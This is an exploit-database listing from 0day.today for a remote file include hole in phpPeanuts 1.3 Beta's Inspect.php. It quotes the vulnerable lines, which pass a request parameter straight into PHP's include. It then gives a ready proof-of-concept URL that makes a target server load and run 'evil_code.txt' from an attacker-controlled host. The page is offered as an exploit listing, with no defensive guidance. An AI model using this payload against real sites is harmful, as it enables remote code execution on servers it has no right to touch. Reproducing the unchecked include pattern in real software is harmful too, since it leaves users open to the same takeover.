[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpPeanuts 1.3 Beta (Inspect.php) Remote File Include Vulnerability

Author
Hidayat Sagita
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1163
Category
web applications
Date add
14-11-2006
Platform
unsorted
===================================================================
phpPeanuts 1.3 Beta (Inspect.php) Remote File Include Vulnerability
===================================================================



.:: Preface ::.

Type     : Remote File Include
Scripts     : Phppeanuts 1.1
Founder  : Hidayat Sagita aka bomm_3x

.:: What ? ::.

In Inspect.php file on line :

4. if ( isSet($_REQUEST["Include"]) )
5.     include $_REQUEST["Include"];

Variable "Include" not verified first before being used.

.:: Proof Of Concept ::.

http://site/[phppeanuts_path]/pntUnit/Inspect.php?Include=http://yoursite/evil_code.txt ?

.:: Shoutz ::.

eCHo staff, az001 and All newbz.




#  0day.today [2024-11-15]  #